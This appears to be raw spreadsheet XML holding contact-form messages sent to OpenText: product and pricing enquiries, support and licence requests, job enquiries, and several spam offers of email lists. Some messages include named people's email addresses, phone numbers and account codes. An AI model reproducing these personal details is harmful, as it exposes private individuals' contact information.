    <t>We are an existing customer of eDocs DM and we are looking to upgrade from 5.3.1 to the latest DM version.  I've tried contacting our rep (Ben Afework) but never hear back from him.  Can you have someone contact me at the above email address?  We are also looking at cloud hosting as an option._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Paul</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
 _x000D_
Would you be interested in acquiring database of *Targeted Industry Emails List 2017* with top level decision makers for your marketing and sales initiatives?_x000D_
_x000D_
Industry List: Healthcare Industry, Information Technology Industry, Automotive Industry, Finance &amp; Banking Industry, Publishing Industry, Manufacturing Industry, Education Industry, Construction Industry, Hospitality Industry, Technology Industry, Chemical Industry and more..._x000D_
 _x000D_
If you’re interested please email me with your requirement, so that we can send more information and few samples at no cost._x000D_
Target Industry: ____? Target Geography: _____? Target Job Title: ____?_x000D_
List comes with complete data fields like as:_x000D_
Contact name	Website URL	Company name	Job title	Postal address	Phone number	Fax Number	Email Address_x000D_
 _x000D_
Terms and conditions_x000D_
 Usage and guarantee terms for this purchase_x000D_
License type:	List purchase is for your perpetual usage, the entire file will be transferred to you along with the ownership rights_x000D_
Format:	List will be delivered to you in an Excel/CSV format._x000D_
Guarantees:	We guarantee 90% accuracy on the Emails and 95% accuracy on all the other data information_x000D_
Timeline:	List will be delivered to you within 4-7 business days from the date of agreement and upon receipt of payment_x000D_
OPT-IN:	These contacts are opted-in to receive third party marketing information_x000D_
 _x000D_
If you are not the decision maker on this, kindly forward email to the right contact._x000D_
 _x000D_
Appreciate your time &amp; look forward to hear from you._x000D_
 _x000D_
Regards,_x000D_
Sherry Wilson_x000D_
Online Marketing Executive_x000D_
 _x000D_
If you don't wish to receive our newsletters, reply back with "Opt-Out" in subject line._x000D_
 _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I am IBM Employee working as contractor to BP Plc, UK. One of my colleague "npatrale@in.ibm.com" is also working in BP Project. I would like to have same access level. Below are some of the details I got from colleague:_x000D_
Product Line: Open text_x000D_
End UserCode: 8095016262_x000D_
CO worker: Shilpa Y Lakshminarayanaswamy</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
during researchs I stumbled upon your product 'OpenText Digital Asset Management for SAP Solutions'._x000D_
_x000D_
I'm looking for further information for the following topics:_x000D_
- Supported file formats_x000D_
- Frame-accurate handling of video formats (e.g. exctraction of freeze-image)_x000D_
- Timecode-Support_x000D_
- What kind of player is used for videos_x000D_
_x000D_
Thank you for your feedback._x000D_
_x000D_
Kind regards,_x000D_
_x000D_
Stefan Stettler</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Team,_x000D_
_x000D_
I am currently working alongside with few of the leading experts in the industry on a project called the ‘6th Edition Big CIO Show &amp; Awards 2017’ which is scheduled to take place on the month of June 2017, in Mumbai (India). Our partners include the likes of Leading Associations, Top-notch firms &amp; the biggest solution providers.  I am getting in touch with you`ll today, to understand if ‘OpenText Corp.’ would like to take up an active role in being one of the prime solution providers at this high profile gathering. _x000D_
_x000D_
Please do let me know, as to whom I can take this up with. _x000D_
_x000D_
Other conferences:_x000D_
_x000D_
•	5th Edition BFSI Future Tech Conclave on May`17, in Jaipur (residential event)_x000D_
•	Pharma CIO Conclave &amp; Awards on August`17, in Mumbai  _x000D_
•	Healthcare Tech Summit on August`17, in Mumbai _x000D_
•	Digital Transformation Summit on August`17, in Mumbai _x000D_
•	Cyber Security Conclave on October`17, in Goa _x000D_
•	Big Data Analytics Workshop on November`17, in Mumbai _x000D_
•	CMO Conclave on September`17, in Bengaluru_x000D_
_x000D_
_x000D_
Kind Regards,_x000D_
_x000D_
Andrew Chiu_x000D_
+91 9886907512_x000D_
</t>
  </si>
  <si>
    <t>details and price for R&amp;D solution +Electronic Trial Master File</t>
  </si>
  <si>
    <t>Hi_x000D_
We would like to submit a vendor registration form. Kindly let us know the procesure or send us a form to fill in the details required and submit our documents .</t>
  </si>
  <si>
    <t>Need Open Text Desktop Viewer (Imagenation) pricing for our customer Gulfstream Aerospace</t>
  </si>
  <si>
    <t>Spyview question URGENT</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
Below is a quick e- introduction of Home Road Films:_x000D_
_x000D_
Home Road Films is an animation studio based out of New Delhi, India. We design a variety of animated videos (mainly 2D) as well as produce live shoot films for Companies of all sizes and creative agencies. _x000D_
_x000D_
It would be great if you could have a look at it and if by any chance something clicks, I am just a phone call away. _x000D_
_x000D_
Animation Showreel: https://vimeo.com/168902159_x000D_
Website: www.homeroadfilms.com_x000D_
Different categories we have worked for - http://homeroadfilms.com/portfolio.html_x000D_
_x000D_
Regards,_x000D_
_x000D_
Apoorva Chopra - Project Manager_x000D_
www.homeroadfilms.com_x000D_
SkypeID: "apoorva.chopra"</t>
  </si>
  <si>
    <t>I would like to receive access to Open text knowledge base and support._x000D_
_x000D_
Thanks._x000D_
Kobi</t>
  </si>
  <si>
    <t>Want to know more about Archive center for SAP solution - cloud edition SAAS service . If there is any case study available please share , please share what is pricing model for same.</t>
  </si>
  <si>
    <t xml:space="preserve">Does your company host internship program for under graduate students. </t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
 _x000D_
Would you be interested to acquire an opt-in email list of oracle  Users?_x000D_
_x000D_
We have a ready to deliver verified email list of 180,000+ oracle  Users from USA, UK, Canada, Australia, Europe and rest of the World._x000D_
_x000D_
Few of our lists mentioned below :-_x000D_
ENDECA_x000D_
JD EDWARDS WORLD_x000D_
PEOPLESOFT ENTERPRISE_x000D_
SIEBEL_x000D_
HYPERION_x000D_
ORACLE E-BUSINESS SUITE_x000D_
And other oracle products_x000D_
_x000D_
Data Fields Includes : - Company Name, Contact Name, Job Title, Email Address, Telephone Number, Fax Number, Physical Address, Zip Code, Website, Technology type etc._x000D_
_x000D_
Let me know your interest, so that we could discuss further._x000D_
_x000D_
Regards,_x000D_
jessica_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">"Hello,_x000D_
_x000D_
Hope you are doing well._x000D_
I thought you might like to know some of the reasons why you are not getting enough organic &amp; social media traffic for your website. Take a break from your busy schedule and give attention towards Organic search engine traffic for your website. Don’t you think to start a fresh and better internet campaign? Yes, you must be interested to drag revenue by putting your website top in search engines._x000D_
 _x000D_
We found some major issues with your website:_x000D_
 _x000D_
•         Low online presence for many competitive keyword phrases_x000D_
•         Stumpy image optimization_x000D_
•         Deprived website content_x000D_
•         Inappropriate Social Media campaign_x000D_
If you want to know more such points about what your site needs, and are curious to know what our working together would involve, then I would be glad to provide you with further detailed analysis in the form of a FREE SITE ANALYSIS REPORT or PRE SEO REPORT or WEBSITE ANALYSIS REPORT._x000D_
 _x000D_
 _x000D_
If my proposal sound's alluring for your business objective, feel free to email us._x000D_
Let me know your thought and if possible give me the best time to make further discussion._x000D_
 _x000D_
Warm Regards,"_x000D_
</t>
  </si>
  <si>
    <t>Interested in looking at your product as we are looking for a system</t>
  </si>
  <si>
    <t>we are interested in bulk redaction.</t>
  </si>
  <si>
    <t>I myself want to place as one of the employee in open text</t>
  </si>
  <si>
    <t>I need to quote Alchemy for Panama_x000D_
Do You have distribution in Mexico and / or Panama</t>
  </si>
  <si>
    <t>Good Day from Peter,_x000D_
_x000D_
Hope you're doing great._x000D_
_x000D_
I wanted to reach out and check whether you have need of Entertainment Software industry?_x000D_
_x000D_
We have complete contact detail of Software developers, Buyers and Retailers, Programmers, Distributors, Entertainment industry representatives, Financiers and venture capitalists, Importers and Exporters, Manufacturers, Resellers, Researchers, Educators, Financial and industry analysts and worldwide electronic and print media._x000D_
_x000D_
Kindly let me know if you are interested in acquiring more information._x000D_
_x000D_
Thank you for your time in advance._x000D_
_x000D_
Regards,_x000D_
Peter Thomas | Marketing Manager</t>
  </si>
  <si>
    <t>Prezados, boa noite._x000D_
Gostaria de saber mais sobre parceira da OpenText no Brasil._x000D_
_x000D_
Obrigado,_x000D_
Igor</t>
  </si>
  <si>
    <t>I am looking to have a conversation to see if RightFax is the correct product for our company.  We currently run CUCM 11 and are looking for email-to-fax/fax-to-email functionality.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I seem to have some troubles registering for the Stockholm innovation tour event. I registered a while back and when I was double checking the  details today I couldn't find a confirmation mail. Because I couldn't find a mail I thought something must of gone wrong so I registered again but I still haven't gotten any confirmation mail. Can you please help me with this? Thanks!_x000D_
_x000D_
Kind regards,_x000D_
Nicklas</t>
  </si>
  <si>
    <t>I am mandated by a client to identify a target BPM solution. The client has OpenText MBPM in use today and is unsure about the future product strategy. Would very much appreciate a call tomorrow. Thanks.</t>
  </si>
  <si>
    <t>Hi,_x000D_
 _x000D_
I hope you are the right person to discuss about the updated database of Event Management Software users. _x000D_
 _x000D_
Database includes complete contact details and verified email addresses of all software Professionals and all the key decision makers from any job function you want to focus from the entire world of software sectors mentioned above._x000D_
 _x000D_
Industry covered: Event Management, Communications, Insurance, Education, Marketing &amp; Advertising, Healthcare, IT Software/Hardware,Hospitality, Manufacturing, Banking, Construction, IT,  Retail etc.._x000D_
 _x000D_
Let me know your target criteria/market like:_x000D_
 _x000D_
Target Industry:_x000D_
Target Job Title:     _x000D_
Target Geography:_x000D_
 _x000D_
Look forward to hear from you._x000D_
_x000D_
Regards,_x000D_
Claudia Rose_x000D_
Marketing Manager_x000D_
Aculides</t>
  </si>
  <si>
    <t>I heard about alivemax some 8 years back and had since then wanted to be a member but i could not find the ways of joining. I live here in Lesotho and it's not there so i want to be the first one to introduce it to Basotho. I really want to be a member please help._x000D_
_x000D_
Maxim_x000D_
Maxi</t>
  </si>
  <si>
    <t xml:space="preserve">In regards to sponsorship for our annual gala and/or ongoing giving. _x000D_
 </t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour,_x000D_
_x000D_
Je travaille en tant que Program Architect pour un programme de transformation chez un client français, qui va notamment remplacer le back office actuel (divers outils) avec une solution unique portée par la plateforme Salesforce._x000D_
_x000D_
Il y a actuellement une étude cadrage sur le sujet de la dématérialisation._x000D_
_x000D_
Leur besoin est d'une part de numériser les documents papiers reçus et d'autre part d'avoir une GED leur permettant d'administrer ces documents, directement depuis la solution Salesforce._x000D_
_x000D_
L'objectif est notamment à l'aide d'un OCR d'associer directement un un document à un dossier lors de la numérisation et de faire le raccrochage automatiquement dans Salesforce._x000D_
_x000D_
J'ai bien identifié votre connecteur OpenText Extended ECM for Salesforce® mais j'aurai besoin d'éléments par rapport aux questions suivantes :_x000D_
_x000D_
-        La fonction de recherche permet-elle d’aller jusque dans le contenu des documents ?_x000D_
-        Capacité de capture de documents par l’OCR : papier, e-mail entrant ?_x000D_
-        Capacité de raccrochage automatique d’un document à un dossier suite à une acquisition OCR_x000D_
_x000D_
Merci pour votre aide._x000D_
_x000D_
Cordialement,_x000D_
_x000D_
Damien Malahel_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>First class tech support, we are getting constant disconnections that force us to log back in to the fc.oldhamlea.org.uk server. Please can you advise what events will cause a disconnection and if you know of any settings we need to apply to keep a constant connection?</t>
  </si>
  <si>
    <t>My company is using SpyView.  So I'd like to request the on-line support.  Thanks.</t>
  </si>
  <si>
    <t>Please send a copy of your W9 for our records.  Thank you!</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
ich wurde von meiner Hochschule, an der ich im vierten Semester Wirtschaftsinformatik studiere, für das duale Studienprogramm I.C.S. nominiert. _x000D_
Vor allem die Möglichkeit, dieses Programm bei Ihnen zu absolvieren, fände ich sehr interessant. Da ich unter anderem aus persönlichen Gründen mein Praxissemester jedoch in Chicago machen würde, wollte ich vorab klären, ob die Möglichkeit bestehen würde, dieses halbe Jahr in Ihrer dortigen Niederlassung zu verbringen und dann zurück nach München zu kommen. _x000D_
_x000D_
Über eine baldige Antwort wäre ich sehr dankbar,_x000D_
mit freundlichen Grüßen_x000D_
Sonja Deißenböck</t>
  </si>
  <si>
    <t>Want to install Empower on Tomcat 8.0</t>
  </si>
  <si>
    <t>Pricing for Captiva Web Client (ie. EMC Captiva Cloud Capture)</t>
  </si>
  <si>
    <t xml:space="preserve">We would like to have Online Fax which we currently have a fax number, we are wondering if possible to port over the fax line to you guys and also integrate fax feature to office programs and email fax and receive fax via email. We are moving to Skype for Business for our Cloud PBX from Fonality. </t>
  </si>
  <si>
    <t xml:space="preserve">My name is Paul Smith associated with InfoGlobalData, a Data Intelligence firm based out of Seattle, WA._x000D_
_x000D_
Would you be interested acquiring a contact Information from Medical/Pharmaceutical Industry?_x000D_
_x000D_
List Include: Clinical Research Organizations, Pharmaceutical Companies, Bio-Pharmaceutical Companies, Medical Research Companies, Medical Device Companies, Bio-Technology Companies, Life Sciences Organizations, Medical Laboratories, Medical Centers, and Universities._x000D_
 _x000D_
Geography: USA, Canada, UK, Europe, Middle East &amp; Asia._x000D_
_x000D_
If interested, do let me know what type of Target Audience/Job title/Geography you are looking for?_x000D_
_x000D_
Respectfully,_x000D_
_x000D_
Paul Smith_x000D_
InfoGlobalData_x000D_
pauls@infoglobaldata.com_x000D_
</t>
  </si>
  <si>
    <t>one of our clients is a law firm and they are looking to replace their current document management system Worldox GX3</t>
  </si>
  <si>
    <t>Good Day...We at the Honeywell Minneapolis, USA location started using Actuate Performance Scorecard (when it was PBViews) back in 2000; however 2+ years ago, leadership decided to stop using the tool.  I would like to see us bring the tool back to our site. That being the case, it would be great if I could connect with other Honeywell International users of Actuate Performance Scorecard besides the Minneapolis, Minnesota site so that I can show it is being used by other Honeywell locations.  Are you able to see what if any other sites of Honeywell are using the tool and give me their contact information?</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour,_x000D_
_x000D_
Responsable marketing de la marque WEGOBOARD, je souhaite m'entretenir _x000D_
avec vous afin d'établir ensemble nos conditions pour un futur _x000D_
partenariat._x000D_
En effet, il nous semble intéressant de pouvoir évoluer ensemble par des _x000D_
échanges de liens, d'articles, ou d'autres données si vous le souhaitez._x000D_
_x000D_
Nous proposons également un service d'affiliation._x000D_
_x000D_
Ce système permet à votre entreprise de générer des liens indirects vers _x000D_
notre site. Pourquoi indirects ?_x000D_
L'internaute clique sur le lien que vous aurez inséré sur votre article _x000D_
concernant WEGOBOARD. Ce client pourra alors naviguer sur _x000D_
www.wegoboard.com et analyser nos produits._x000D_
_x000D_
Si un achat est effectué, notre plateforme informatique enregistre _x000D_
automatiquement votre identifiant, et vous serez rémunéré à hauteur d'un _x000D_
pourcentage (sur le montant total de la vente) fixé au préalable._x000D_
_x000D_
Cela est d'autant plus intéressant que nous sommes numéro 1 en France, _x000D_
avec des garanties imbattables (2 ans pièces et mains d'œuvre). Nous _x000D_
avons plusieurs showrooms en France, un SAV en France et une plateforme _x000D_
joignable tous les jours. Nous proposons uniquement des cartes mères de _x000D_
qualité, des composants certifiés aux normes européennes et des _x000D_
batteries exclusivement Samsung._x000D_
_x000D_
Avec nos partenaires actuels, le taux de conversation est compris entre _x000D_
2 et 8 pourcent, ce qui est assez conséquent puisque les taux moyens _x000D_
d'affiliation sont à 0.5% en règle générale._x000D_
_x000D_
_x000D_
Si un partenariat ou une affiliation pourrait vous intéresser, n'hésitez _x000D_
pas à me recontacter par mail à cet effet, à l'adresse _x000D_
contact@wegoboard.com , nous pourrions alors convenir d'un rendez vous _x000D_
téléphonique ensemble._x000D_
_x000D_
Bien cordialement,_x000D_
_x000D_
Jérémy_x000D_
Service Marketing Wegoboard_x000D_
contact@wegoboard.com_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We want to get away from local faxing with analog lines on site.  We need to get started with rightfax this week if possible.  This is my top project right now.  </t>
  </si>
  <si>
    <t>Dear Madam, Dear Sir,_x000D_
_x000D_
we are currently evaluating products for a customer project using OpenText. Please provide us with demonstration access. Furthermore we will be using an API of OpenText: Do you have references or documentation on that?_x000D_
_x000D_
Thanks in advance!_x000D_
_x000D_
BR_x000D_
Gerrit Leder</t>
  </si>
  <si>
    <t>Evaluation/Training License to prepare our Staff for a project with an organization, which is already working with your content suite. Interest in a license for 3.x and pre 3.x releases, as migration from 2.x to 3.x may also be of interest.</t>
  </si>
  <si>
    <t>I need a copy of our last renewal invoice. If support was not renewed please let me know. Thank you!</t>
  </si>
  <si>
    <t>Looking for a secure electronic fax solution.</t>
  </si>
  <si>
    <t>we are trying opentext ihub and analytic designer for evaluation based on certain criteria._x000D_
_x000D_
we need to get data from our web API into analytic designer. I am trying to connect to data source using actuate REST data source. but i am not able to make connection and get data in JSON format._x000D_
_x000D_
Do you have any step by step video/tutorial for the same?</t>
  </si>
  <si>
    <t xml:space="preserve">We’re getting a lot of error messages when sending out faxes… please see the example below_x000D_
_x000D_
-----------------_x000D_
_x000D_
Your Fax with subject: (2328123) Our Ref: C297LP0011, Your Ref: 2936-4397 was not sent!_x000D_
Sent to '+16018989281'  _x000D_
Addressed to '+16018989281' was not sent!_x000D_
_x000D_
Non-delivery explanation:_x000D_
service denied for this message (e007)_x000D_
_x000D_
Submitted at: March 21, 03:55:20 PM_x000D_
Items sent: 0 pages_x000D_
Number of attempts: 0_x000D_
Job Reference: 0541000170805732028_x000D_
_x000D_
Please DO NOT REPLY this email. If you have any questions or comments regarding the GI Fax service, please contact your Helpdesk._x000D_
_x000D_
Best regards_x000D_
Richard_x000D_
</t>
  </si>
  <si>
    <t>Interested in migration from Gupta Team Developer 6.2 to OpenText Team Developer 7.0. Would like to try newest update for TD 7.0. _x000D_
_x000D_
Kind regards,_x000D_
_x000D_
Beno Krasovec</t>
  </si>
  <si>
    <t>Please can someone in your Accounts Receivable department contact me via email? Our customer number with you is 115156.</t>
  </si>
  <si>
    <t>Access To Knowledge Center</t>
  </si>
  <si>
    <t>Bonjour Madame, Monsieur,_x000D_
_x000D_
Nous sommes actuellement en recherche et étude de solution DAM et nous nous intéressons à votre produit. _x000D_
Pourriez-vous nous transmettre une documentation décrivant précisément votre offre ?_x000D_
_x000D_
Cordialement_x000D_
_x000D_
Dornier Damien_x000D_
Air Liquide Welding</t>
  </si>
  <si>
    <t xml:space="preserve">I have been in contact to set up a cloud fax to email service with your company but I have received no response recently from the contact. Can we please set up a trial fax to email service and can someone contact me regarding this Thanks for your help </t>
  </si>
  <si>
    <t xml:space="preserve">I have created request for full access via SAP market place._x000D_
I am interesting will you create new account for me,or you will give me more rights for my account._x000D_
Thank you!_x000D_
</t>
  </si>
  <si>
    <t>We have just purchased new EAN codes from GS1 and now have an issue that the new codes are not accepted by Opentext due to the change of prefix. This means we are not able to add new products to our customer EDI catalogues. I would like to understand why this happens and how we can solve it. The case is urgent. Could you give me a call back?_x000D_
_x000D_
Thanks in advance,_x000D_
_x000D_
Camilla</t>
  </si>
  <si>
    <t>Global Enterprise Solution for BPO operations in Acute Care and Provider revenue cycle space</t>
  </si>
  <si>
    <t xml:space="preserve">Dear sir/madam,_x000D_
_x000D_
_x000D_
We are interested in implementing a new file management software._x000D_
_x000D_
I would like to send a email with a RFI file in this regard; I kindly ask that you fill it out and return it back to us completed at your earliest convenience._x000D_
_x000D_
I would like to take this opportunity to thank you in advance and to say that I look forward to hearing back from you._x000D_
_x000D_
Best regards, _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello. Im looking for someone who is working in Your company. I really need to contact with this person. His name is Ted Baginski. This is important for me so please send to him message that i am looking for him._x000D_
Thank you </t>
  </si>
  <si>
    <t>We are looking for best ECM solution for the enterprise._x000D_
Do you have any sales representative in Brazil, so we could manage a presentation?</t>
  </si>
  <si>
    <t>Looking for cost effective electronic fax solutions to integrate with our EPIC EMR.</t>
  </si>
  <si>
    <t>I looking information about the RightFax, to schedule a demo and to quote a solutions for 20-30 channels,</t>
  </si>
  <si>
    <t>Re seller with client needs Rightfax solution with GE Centricity integration</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Team,_x000D_
_x000D_
Currently we have  Open Text 10.5.0 is installed and need support central and learning center access._x000D_
_x000D_
also let us know how to provide installed system details and also let us know to extract System details from the system._x000D_
Supporting company is BHP Billiton._x000D_
</t>
  </si>
  <si>
    <t>Login problems</t>
  </si>
  <si>
    <t xml:space="preserve">Simply looking for a post-document creation, records management retention, deletion/archiving solution with legal hold and some paper scanning capabilities. Not looking for a full blown ECM, simply records management.  </t>
  </si>
  <si>
    <t>I am from Enpointe Technologies. We are IT reseller based in California, United States. One of our customer is interested in purchasing following software through us. Can you please send me reseller quote for Exceed 3D for 1 user.</t>
  </si>
  <si>
    <t>Access to Knowledge Base and My Support in Open Text Support Portal</t>
  </si>
  <si>
    <t>I am interested in approximately 20 licensed NFS servers to support communication between VxWorks SBCs and Windows workstations. We are currently using an NFS server that is not properly supported in 64 bit Windows operating systems. We would like to use a more supportable NFS server to support this configuration. Thank you.</t>
  </si>
  <si>
    <t>Looking for a quote on Open Text._x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">We just added a new company prefix, and the GXS catalog is not allowing me to add it to my account. Seems like it would be straight forward but it's not an option. Help. </t>
  </si>
  <si>
    <t>Good Afternoon, if you have SocioEconomic Small Businesses (i.e.:  WOSBs, HUBZones, SDVOSBs) that can provide Maintenance for the Documentum SW that ATF has, will you please send me a list of those vendors?  Thank you!</t>
  </si>
  <si>
    <t>Need to speak to someone that handles corporate training.  I have someone I need to register for Documentum training ASAP.</t>
  </si>
  <si>
    <t>Good morning, we are using your Free DWG Viewer in our Company to read *.dwg files. It seems that you realease each 3months updates which makes your installed Version obsolete._x000D_
We always get an Invalide Licence error, and can't open the files anymore. After update to the current Version the files work._x000D_
Is this behavior normal ? _x000D_
_x000D_
John Wolf</t>
  </si>
  <si>
    <t>I have a client that has Applicationxtender and is interested in Image Capture price (10 licenses)</t>
  </si>
  <si>
    <t>It appears that we are unable to have duplicate item/product numbers in the GXS Catalog. How are we supposed to provide our products to two separate trading partners that have two separate sets of compliance guidelines in regards to how items are set up in GXS?</t>
  </si>
  <si>
    <t>Unable to get opentext api to work with findur whilst upgrading to RightFax 10.6</t>
  </si>
  <si>
    <t xml:space="preserve">Hi - I work for OT in CEM WFO and we have a customer asking some questions about LMS could you drop me a line so i can chat through what we are after? - thanks Paul </t>
  </si>
  <si>
    <t>I need to purchase additional 50 licenses for our Documentum eRoom (i.e.DangoteEROOM). We have purchase the site access from EMC Dell but now that OpenText has acquired Documentum, please what is the process for acquiring the 50 new licenses for our Dangote EWOGGS Project Exclusive use._x000D_
_x000D_
I will appreciate your response on this matter a.s.a.p</t>
  </si>
  <si>
    <t>Support contract renewal. Is it possible to have a hourly fee or do we have to make a full year renewal? We have a problem requiring your quick assistance. Thank you!</t>
  </si>
  <si>
    <t>Access to Knowledge Documents</t>
  </si>
  <si>
    <t>We are an existing client and I am trying to get a hold of anyone who will talk to me about our current account and licenses.  I left a voice mail yesterday and no one has called me back.  I do not have any idea who our Account Representative is.  I am looking for that information ASAP.  Thank you</t>
  </si>
  <si>
    <t>Dear Ladies and Gentleman,_x000D_
we would like to use your BRAVA !DWG Viewer for a longer Time than just 90 Days as a trial. Therefor we need another license Model as you provide for us. So could you please tell us what to do, to get a full license for our PC´s? It is always a big deal for us, to reload and install the newest Versiom on our PC´s. Thank you in advance._x000D_
_x000D_
Best regards_x000D_
Michael Grimmig</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
We are an ITES providing company in Bangladesh. We are interested to know about your partnership program as we are interested to work with OpenText's Documentum ECM and DMS solution. Thanks. </t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
Je souhaite mettre en place un système d'étiquetage au niveau du service expéditions au sein de mon entreprise._x000D_
Je souhaiterai, si possible rencontrer quelqu'un de votre entreprise afin de me présenter les solutions adéquates à mon besoin._x000D_
_x000D_
Dans l'attente de vous lire,_x000D_
_x000D_
Cordialement, _x000D_
_x000D_
Elise HARANT</t>
  </si>
  <si>
    <t>Cloud Fax solution for Canon Products, I need pricing structure for all components as well as process to set up customer accounts._x000D_
_x000D_
Thanks,_x000D_
Chris</t>
  </si>
  <si>
    <t>I have not been able to find any information about OpenText's sponsorship policies. Does the company sponsor things like special events or gallery exhibitions?</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
We have 5,060 Ready-to-buy leads of Office 365 Technology from UK._x000D_
 Samples will be given to review and check the quality of the lead, then you can proceed further if interested._x000D_
can i send sample data for verification? _x000D_
_x000D_
Regards,_x000D_
Briley Sanford_x000D_
briley.sanford@texttechzone.com_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Career Opportunities </t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
Pourriez-vous me contacter.</t>
  </si>
  <si>
    <t>Hello, our company looking for suitable BRMS product for internal use. We are interested in your solution. Can you provide us with prices for product and support?</t>
  </si>
  <si>
    <t>Dear Sir/Madam,_x000D_
_x000D_
Our company (DS Smith Paper De Hoop) starts or will start to perform business with your company (Open Text AG, Baden)._x000D_
To come to a quick payment settlements of your invoices, could you please provide contact details and your company's bank account number?_x000D_
A document or e-mail is sufficient._x000D_
We have contact with Katy Atkinson._x000D_
_x000D_
This is a control means to prevent us perform bill payments to the wrong person / entity_x000D_
_x000D_
Thank you for your assistance in this matter._x000D_
_x000D_
Best regards,_x000D_
_x000D_
Stefan van de Scheur</t>
  </si>
  <si>
    <t>Registered for download of BIRT iHub F-Type last week, but cannot find any download source for F-Type. Can also not find any download source for Eclipse Based Analytics designer._x000D_
Have you stopped the 50 MB Freemium offer on BIRT iHub F-Type?</t>
  </si>
  <si>
    <t>Hej, Vi är eventuellt intresserade av ett referensbesök till ett företag som använder er fakturascanning ihop med SAP.  Om det skulle vara aktuellt, finns det ett referensföretag i närheten som vi kan besöka? Vi finns placerade i Halmstad. _x000D_
_x000D_
MVH_x000D_
Jesper Adolfsson</t>
  </si>
  <si>
    <t xml:space="preserve">Membre du groupe Wallgreen Boots Alliance, _x000D_
_x000D_
Alloga est une société de logistique pharmaceutique_x000D_
_x000D_
Pouvez-vous me contacter, nous sommes intéressés par l’une de vos solutions_x000D_
Nous sommes actuellement sur SAP et travaillons sur l’amélioration de notre organisation au niveau: _x000D_
-	dématerialisation de factures._x000D_
_x000D_
_x000D_
Dans l’attente de votre appel_x000D_
</t>
  </si>
  <si>
    <t>I can't access the download option under EFM, and I am not sure how else to request this update.  Can you please assist with checking my account and make it the same as Daniel Jewell's? thanks Christa</t>
  </si>
  <si>
    <t>Hi. I am representing an NZ corporate operating in the energy sector, and we would like to arrange an online demo for a maximum of 1 hour next Monday or Tuesday 27th or 28th March. Please contact me by email and I will provide further details. Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">Please contact me as soon as possible._x000D_
</t>
  </si>
  <si>
    <t>We are working with a local government client in New Zealand. They have an existing ECM system that they are using which has some critical UX and compliance issues. We are evaluating options to resolve these issues, including potential replatform._x000D_
_x000D_
This is not an RFP request etc. However the client would like to be able to weight their options costs/benefits. As part of the replatform option we are looking for some additional information regarding your ECM product. Initial information we are looking for include:_x000D_
- product feature set and roadmap _x000D_
- any available customisations, APIs / Web services and standards these may adhere to_x000D_
- any available client references (local if possible) _x000D_
- licensing model and indicative costs (can be high level)_x000D_
- cloud offering_x000D_
- integrations with other products_x000D_
_x000D_
We have a list of requirements (user story format) retrieved from users at the council, which can be provided to understand the types of problems we are looking to resolve - key focus is usability and ease of use for core functions to drive uptake of the system and a secondary focus on available features and regulatory compliance.</t>
  </si>
  <si>
    <t>Can I please get an itemized invoice for renewal # RC178597?_x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t xml:space="preserve">Partnership for co-delivery on a project Dataprise was awarded. </t>
  </si>
  <si>
    <t>Wondering what a pricing plan would be for a collaborative platform that allowed for 125 users</t>
  </si>
  <si>
    <t>I am trying to download brava reader. We have been using this for years and i always just click download. Now it is asking for information and says it sent a link to my email but I never received it. I did check in junk mail but nothing. Are you still offering the free reader?</t>
  </si>
  <si>
    <t>I need to get Support Access. We're having issues deploying Documentum's CMIS application in JBOSS</t>
  </si>
  <si>
    <t>We have Brava version 7.4.0 on a Windows 7 computer but want to upgrade to Windows 10. Is our version compatible with Win 10?</t>
  </si>
  <si>
    <t>What type of licenses are the Redact-It Desktop licenses? Can one license be used for one on a workstation and a laptop or is it one license per computer?</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for plugins to install for IE?_x000D_
OpenText Office Editor 10.5.1_x000D_
OpenText Office Editor (64-bit) 10.5.1_x000D_
Content Server – WebDAV 10.5.0_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Would you be interested in acquiring our recently updated contact list of “Higher Education Industry Professionals” with emails address? If so, please let me know your target audience. I will get back to you with counts and best pricing option._x000D_
	_x000D_
Note: If Higher Education Industry is not relevant to you please reply back with your requirement, we have all type of lists that would meet your quality prospecting-_x000D_
_x000D_
Target Industry:  _____________; Geography:  ______________; Job Title (Any):  _________________:_x000D_
_x000D_
Data included: Company Name, Contact Name, Fist Name, Last Name, Email Address, Title, Website, Address, Address 1, City, State, ZIP Code, Country, Phone Number, FAX Number, Employees size, Revenue ($ Mil), SIC Code and Industry. _x000D_
_x000D_
Look forward to hearing from you._x000D_
_x000D_
Thanks,	_x000D_
_x000D_
Marcus Ford_x000D_
Inside Sales Executive</t>
  </si>
  <si>
    <t xml:space="preserve">Wheels implemented a number of business process applications on the Metastorm system starting 10 years ago with the help of an external consultant.  Consultant is no longer available.  Wheels is looking to form a relationship with either OpenText or an OpenText/Metastorm knowledge vendor for maintaining/updating the system. </t>
  </si>
  <si>
    <t>Need to know who our rep is at our Houston HQ..   current contact email is bouncing back to us.</t>
  </si>
  <si>
    <t>Just wanted to download a trial version for our Konica C308 / Nuance Auto Store and Output manager systems.  Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">STOP FAX TO +61 3 9844 5155!_x000D_
